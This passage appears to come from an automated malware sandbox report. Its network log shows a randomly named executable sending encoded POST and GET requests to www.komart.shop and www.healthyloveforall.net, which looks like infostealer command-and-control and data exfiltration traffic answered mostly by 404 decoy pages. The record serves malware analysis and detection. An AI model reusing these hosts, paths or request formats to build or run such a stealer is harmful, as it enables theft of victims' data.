                                                                                                                  content-length: 454
                                                                                                                  connection: close
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                                                                                  Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  30192.168.2.550005133.130.35.90804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:39:57.730890989 CEST738OUTPOST /p9u3/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.komart.shop
                                                                                                                  Origin: http://www.komart.shop
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Referer: http://www.komart.shop/p9u3/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 4f 33 68 38 38 30 4a 61 6f 65 74 31 46 2b 42 4a 51 42 74 70 34 6e 56 76 42 44 49 72 7a 37 4f 38 38 4d 42 38 47 64 36 59 68 6b 4c 6f 41 52 69 4a 50 36 49 6a 33 36 52 6d 74 6c 33 57 54 36 71 41 51 42 77 75 57 58 6d 6c 6b 70 6c 31 55 79 38 6c 63 5a 74 4e 2b 4f 77 67 6c 42 6a 54 4f 52 6e 50 38 42 71 2b 51 6d 36 4c 42 35 53 73 45 6c 36 67 65 33 55 6f 72 36 33 58 51 76 53 54 51 57 74 59 30 35 72 58 52 49 68 72 41 2b 6f 78 35 48 35 70 4e 67 70 44 34 77 65 66 63 68 76 4f 6b 6a 2f 4e 39 7a 4e 4e 62 66 48 75 33 4c 4a 6d 55 36 6e 6f 36 62 2b 48 45 39 2f 48 57 54 4f 74 55 4d 4b 2b 4e 79 6b 77 58 46 75 58 66 59 59 5a 4a 61 6a 44 58 6e 6f 30 76 71 45 56 36 72 2f 63
                                                                                                                  Data Ascii: nV=O3h880Jaoet1F+BJQBtp4nVvBDIrz7O88MB8Gd6YhkLoARiJP6Ij36Rmtl3WT6qAQBwuWXmlkpl1Uy8lcZtN+OwglBjTORnP8Bq+Qm6LB5SsEl6ge3Uor63XQvSTQWtY05rXRIhrA+ox5H5pNgpD4wefchvOkj/N9zNNbfHu3LJmU6no6b+HE9/HWTOtUMK+NykwXFuXfYYZJajDXno0vqEV6r/c
                                                                                                                  Oct 8, 2024 15:39:58.520190954 CEST668INHTTP/1.1 404 Not Found
                                                                                                                  content-encoding: gzip
                                                                                                                  content-type: text/html
                                                                                                                  date: Tue, 08 Oct 2024 13:39:58 GMT
                                                                                                                  etag: W/"66fe0220-2b5"
                                                                                                                  server: nginx
                                                                                                                  vary: Accept-Encoding
                                                                                                                  content-length: 454
                                                                                                                  connection: close
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                                                                                  Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  31192.168.2.550006133.130.35.90804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:40:00.275993109 CEST1755OUTPOST /p9u3/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.komart.shop
                                                                                                                  Origin: http://www.komart.shop
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Referer: http://www.komart.shop/p9u3/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 4f 33 68 38 38 30 4a 61 6f 65 74 31 46 2b 42 4a 51 42 74 70 34 6e 56 76 42 44 49 72 7a 37 4f 38 38 4d 42 38 47 64 36 59 68 6b 44 6f 41 67 43 4a 4d 5a 51 6a 32 36 52 6d 79 56 33 58 54 36 72 43 51 46 63 71 57 58 71 31 6b 72 64 31 53 51 30 6c 49 34 74 4e 77 4f 77 67 39 42 6a 53 41 78 6d 53 38 46 4f 79 51 69 6d 4c 42 35 53 73 45 6d 69 67 65 6c 38 6f 70 36 33 55 5a 50 53 50 55 57 74 77 30 35 79 73 52 49 31 52 41 50 49 78 35 6e 70 70 50 56 31 44 6c 41 65 52 64 68 76 57 6b 6a 69 54 39 7a 52 72 62 66 69 37 33 4a 4a 6d 58 4d 47 4e 76 4b 36 48 53 73 4c 32 5a 45 43 6f 45 4a 2b 70 44 77 56 43 62 6b 61 36 54 4b 41 73 44 76 50 75 58 6a 31 34 38 2f 6b 2f 35 75 75 63 62 55 65 72 64 39 6b 6b 57 4b 39 46 73 50 50 56 55 4f 62 71 51 4c 46 79 4f 45 2f 58 2b 49 37 78 55 4c 2b 4e 6e 48 77 69 36 76 67 76 35 73 58 2b 38 68 71 49 4e 69 36 30 6e 42 71 65 34 5a 77 66 53 51 6a 33 36 4e 49 42 74 73 69 62 65 4c 54 70 58 35 6a 68 4d 57 6a 6f 51 77 52 78 65 75 73 6d 31 50 44 34 68 5a 30 53 65 32 75 55 63 78 6b 72 73 45 6c [TRUNCATED]
                                                                                                                  Data Ascii: nV=O3h880Jaoet1F+BJQBtp4nVvBDIrz7O88MB8Gd6YhkDoAgCJMZQj26RmyV3XT6rCQFcqWXq1krd1SQ0lI4tNwOwg9BjSAxmS8FOyQimLB5SsEmigel8op63UZPSPUWtw05ysRI1RAPIx5nppPV1DlAeRdhvWkjiT9zRrbfi73JJmXMGNvK6HSsL2ZECoEJ+pDwVCbka6TKAsDvPuXj148/k/5uucbUerd9kkWK9FsPPVUObqQLFyOE/X+I7xUL+NnHwi6vgv5sX+8hqINi60nBqe4ZwfSQj36NIBtsibeLTpX5jhMWjoQwRxeusm1PD4hZ0Se2uUcxkrsEluCFBZ4aCGs6+50IUdoSuszjfDQr8ESPJsMqHxwP3nK+1tAn6FO1WkhjtX0Kzw0HUKGeeSbiDLz+lDTCDdt9kMfod/lKiv/KTPi9hb063L1W0e7pWiK804heoLQdpZEOaXHOJ2Qnno7QTZzxVnl88fONJe9G91P5g7Fd6YKZdde8WyovSjUTn6+sD0PNZXaWDzgR7d5SxgWFqII7yFxYQ2aJVRMZKfRGSNcV+JU/Dow2XL//LOYyBc39JK4FWaW/u/OgaeAIA3VCshhcYbpXEQzG0ae3Iun8gGw09+szy7lEEUBy0ik2ZwF7yUOqUoaPKft0n43raeqIp7jQQPsUFL2QUh4l8g7SZUkhw2YpAdUnhyD3D30skwZkYVcvJd+jGCdoaLSbSyJP4uCT+6un/aqX5oXrGiAT5/hEs2U/eT0ogpdCYjZ/1K4WiMTkGxDmqFm+wBC77EnjtV+RCX4pa+zyt+NOT5kTeWNJ4/olBkR1efIb6vMWjjcFYFDngbirl3OzWoddGDBhnuXLYVhFNPzQiaLMxGOeBDapCBwlWGOsuf6AhWsdSE449M4zQ76VsYbYbPE4ZfV6+DdZMjjYW/+HK9qz92vWQgiIDrtTcc7OPgsQnpd7k8JiaJhuy5d16nEy7iLR5Yr5w64Rs/1ZHVAy/+JmFTkOFWT [TRUNCATED]
                                                                                                                  Oct 8, 2024 15:40:01.304867029 CEST668INHTTP/1.1 404 Not Found
                                                                                                                  content-encoding: gzip
                                                                                                                  content-type: text/html
                                                                                                                  date: Tue, 08 Oct 2024 13:40:00 GMT
                                                                                                                  etag: W/"66fe0220-2b5"
                                                                                                                  server: nginx
                                                                                                                  vary: Accept-Encoding
                                                                                                                  content-length: 454
                                                                                                                  connection: close
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                                                                                  Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  32192.168.2.550007133.130.35.90804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:40:02.827182055 CEST469OUTGET /p9u3/?nV=D1Jc/C1nh+BZL85aQihK2StkCXQN9YWXqdphFMmfowbAWgC+evwb7cYTziaUWePLaVULTAuSiJlrRgQRJK1EyuYNuFTcIXqGngDeSQ6xB8eOEHekfFMT1fbVeuWDNHI3uA==&ntHx=DVDDWR70P4Ux HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Host: www.komart.shop
                                                                                                                  Connection: close
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Oct 8, 2024 15:40:03.615032911 CEST883INHTTP/1.1 404 Not Found
                                                                                                                  content-type: text/html
                                                                                                                  date: Tue, 08 Oct 2024 13:40:03 GMT
                                                                                                                  etag: W/"66fe0220-2b5"
                                                                                                                  server: nginx
                                                                                                                  vary: Accept-Encoding
                                                                                                                  content-length: 693
                                                                                                                  connection: close
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65 75 63 2d 6a 70 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 22 3e 0a 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2f 65 72 72 6f 72 2f 65 72 [TRUNCATED]
                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  33192.168.2.5500083.33.130.190804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:40:08.807380915 CEST748OUTPOST /u6k6/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.healthyloveforall.net
                                                                                                                  Origin: http://www.healthyloveforall.net
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Referer: http://www.healthyloveforall.net/u6k6/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 51 61 52 72 63 32 31 4c 36 2f 41 4d 63 70 41 36 63 50 56 4a 45 6c 65 50 69 6f 6a 76 35 2f 48 65 52 34 52 6b 37 66 36 34 68 43 56 51 4f 49 76 76 35 57 71 4e 6b 32 4a 2b 57 51 51 52 2f 42 79 2b 6b 36 61 2f 33 35 34 52 44 67 58 45 32 52 6f 31 30 50 4c 35 59 41 64 33 36 34 67 58 50 72 53 2f 51 71 2f 44 35 30 30 54 57 2b 4e 31 51 79 76 36 37 70 44 73 48 2b 6e 6b 7a 77 38 5a 34 58 54 68 69 31 54 36 33 72 39 36 55 4e 4b 52 70 70 46 69 49 45 67 6e 61 62 2b 71 4a 75 38 4d 68 41 50 46 71 75 54 4d 42 59 63 48 33 6c 79 38 51 75 41 36 79 36 56 42 64 46 65 6f 74 2b 62 4b 32 32 77 44 39 31 4c 55 72 56 73 3d
                                                                                                                  Data Ascii: nV=QaRrc21L6/AMcpA6cPVJElePiojv5/HeR4Rk7f64hCVQOIvv5WqNk2J+WQQR/By+k6a/354RDgXE2Ro10PL5YAd364gXPrS/Qq/D500TW+N1Qyv67pDsH+nkzw8Z4XThi1T63r96UNKRppFiIEgnab+qJu8MhAPFquTMBYcH3ly8QuA6y6VBdFeot+bK22wD91LUrVs=


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  34192.168.2.5500093.33.130.190804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:40:12.751411915 CEST768OUTPOST /u6k6/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.healthyloveforall.net
                                                                                                                  Origin: http://www.healthyloveforall.net
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Referer: http://www.healthyloveforall.net/u6k6/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 51 61 52 72 63 32 31 4c 36 2f 41 4d 65 4a 77 36 61 65 56 4a 46 46 65 4f 6e 6f 6a 76 77 66 48 53 52 34 56 6b 37 61 44 39 69 77 68 51 4f 71 48 76 34 53 2b 4e 6c 32 4a 2b 4f 41 51 55 78 68 79 35 6b 36 57 47 33 34 6f 52 44 67 44 45 32 55 55 31 30 38 6a 36 65 51 64 31 31 59 67 56 53 62 53 2f 51 71 2f 44 35 30 77 35 57 2b 56 31 54 43 66 36 38 39 58 74 59 4f 6e 6e 30 77 38 5a 7a 33 54 6c 69 31 54 63 33 71 67 56 55 49 4f 52 70 74 42 69 49 51 38 6b 54 62 2b 73 46 2b 39 5a 67 44 72 4b 72 6f 6e 37 44 4c 67 47 30 32 61 43 52 59 74 51 6f 59 64 70 4f 6c 79 51 39 74 54 39 6e 47 52 71 6e 57 62 6b 31 43 35 57 70 61 5a 4a 74 7a 79 45 32 50 50 45 47 59 49 67 66 69 49 7a
                                                                                                                  Data Ascii: nV=QaRrc21L6/AMeJw6aeVJFFeOnojvwfHSR4Vk7aD9iwhQOqHv4S+Nl2J+OAQUxhy5k6WG34oRDgDE2UU108j6eQd11YgVSbS/Qq/D50w5W+V1TCf689XtYOnn0w8Zz3Tli1Tc3qgVUIORptBiIQ8kTb+sF+9ZgDrKron7DLgG02aCRYtQoYdpOlyQ9tT9nGRqnWbk1C5WpaZJtzyE2PPEGYIgfiIz


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  35192.168.2.5500103.33.130.190804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:40:15.297725916 CEST1785OUTPOST /u6k6/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.healthyloveforall.net
                                                                                                                  Origin: http://www.healthyloveforall.net
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Referer: http://www.healthyloveforall.net/u6k6/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 51 61 52 72 63 32 31 4c 36 2f 41 4d 65 4a 77 36 61 65 56 4a 46 46 65 4f 6e 6f 6a 76 77 66 48 53 52 34 56 6b 37 61 44 39 69 77 5a 51 50 62 6e 76 34 7a 2b 4e 6a 47 4a 2b 48 67 51 56 78 68 79 6b 6b 36 66 4f 33 34 6b 72 44 6c 48 45 32 78 59 31 79 4e 6a 36 58 51 64 31 74 6f 67 55 50 72 53 51 51 71 50 50 35 30 41 35 57 2b 56 31 54 41 48 36 76 4a 44 74 44 4f 6e 6b 7a 77 38 64 34 58 54 42 69 30 32 6e 33 71 6c 71 55 38 36 52 70 4a 6c 69 48 46 67 6b 63 62 2b 75 45 4f 38 61 67 44 57 4b 72 6f 54 4e 44 4b 46 68 30 31 4b 43 52 38 73 54 72 36 56 45 64 7a 71 78 2b 66 54 73 7a 67 56 74 76 58 37 33 6f 77 46 37 6a 34 52 63 71 55 32 46 34 37 32 65 52 35 77 55 4f 79 73 79 2b 50 5a 45 63 6b 6e 55 5a 4d 4f 37 69 39 4c 46 32 65 74 41 69 78 46 39 61 36 68 4e 74 35 38 65 4e 36 30 76 47 42 50 72 2b 31 4d 41 74 71 39 62 61 6d 67 2f 71 74 67 73 6f 2b 36 35 72 61 6f 54 52 46 79 6f 57 38 34 32 6d 42 42 34 6a 35 68 65 4c 6f 47 52 43 6f 51 53 31 6f 47 7a 33 79 41 54 48 55 74 73 65 49 31 6b 6a 4e 57 79 68 37 62 46 70 53 77 [TRUNCATED]
                                                                                                                  Data Ascii: nV=QaRrc21L6/AMeJw6aeVJFFeOnojvwfHSR4Vk7aD9iwZQPbnv4z+NjGJ+HgQVxhykk6fO34krDlHE2xY1yNj6XQd1togUPrSQQqPP50A5W+V1TAH6vJDtDOnkzw8d4XTBi02n3qlqU86RpJliHFgkcb+uEO8agDWKroTNDKFh01KCR8sTr6VEdzqx+fTszgVtvX73owF7j4RcqU2F472eR5wUOysy+PZEcknUZMO7i9LF2etAixF9a6hNt58eN60vGBPr+1MAtq9bamg/qtgso+65raoTRFyoW842mBB4j5heLoGRCoQS1oGz3yATHUtseI1kjNWyh7bFpSwYurqS7el2o8wjGpBdTkW/vsRk2ynJhflfOZXzscm9vRy1SGPvr4pHESki3VQSOOVzq5LJWDANaK1ChYl/FtcvkiZr3avOk5U2eUIj2NnjnIVawVuL8hhe4+FFGAkiMMejxrkJAV3jesSCjkQiNBzNyE9BcljgBa2jyQ+jyAQgi7TtYCISbvOmlnitERRagpt77mJfTpyuWIfrTSJhEbMfs19+tM5W93y48GnynxOpu5PhcEue6F0WJcQ7ep9WX5gCNq3Duh+Mrk15mV+KpBYpO88AauzRL+CgWh0NljX4Q1o4YWleaJ251534rSMw8OYElgn6dvbLfYOHZp4/3ZQSQBMdDK95nJ8vZwaZIzuwAEGuWPQuKnde5khhl1d8iTHVrflFMi+QUSag9PrcQcXQGqb1QkJH9Ir9UBY6uY6JdY+uQvsiyG86ADyTj/btaaodXCgFr2qaM68Ln3nwlJzDM09b+wHdQ1cUlG0vbyIsYz2JfRSQI4UExRIt44uEbPQiHVWK/GxCIvF+oPOzj6FkQOGhgWPzvMKRkRnuSbH+fodtgfh+k/KPHkj6ftnmCRpJgHnpXBtOACsZ6fHcwTzOYHqAPoZdijRvcQhXKQMXFZBlhfCx1HtFZeZxxXs8z8Ko/zcfESerc12GBGD2SMf4OWV8ZlUKKPoV3 [TRUNCATED]


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  36192.168.2.5500113.33.130.190804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:40:17.834502935 CEST479OUTGET /u6k6/?nV=dY5LfBxT8+4OTYgXKtZbNifUsoDX+uWzLeRRn9zdsxFld7n68myH2Gd2W2FS03HPt+W/9NATFibZyiY45uryUTVD4Y8PctWQGLDO40gge8F8TAbPjM2Na57q5AxIn0qb9A==&ntHx=DVDDWR70P4Ux HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Host: www.healthyloveforall.net
                                                                                                                  Connection: close
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Oct 8, 2024 15:40:18.282660961 CEST408INHTTP/1.1 200 OK
                                                                                                                  Server: openresty
                                                                                                                  Date: Tue, 08 Oct 2024 13:40:18 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 268
                                                                                                                  Connection: close
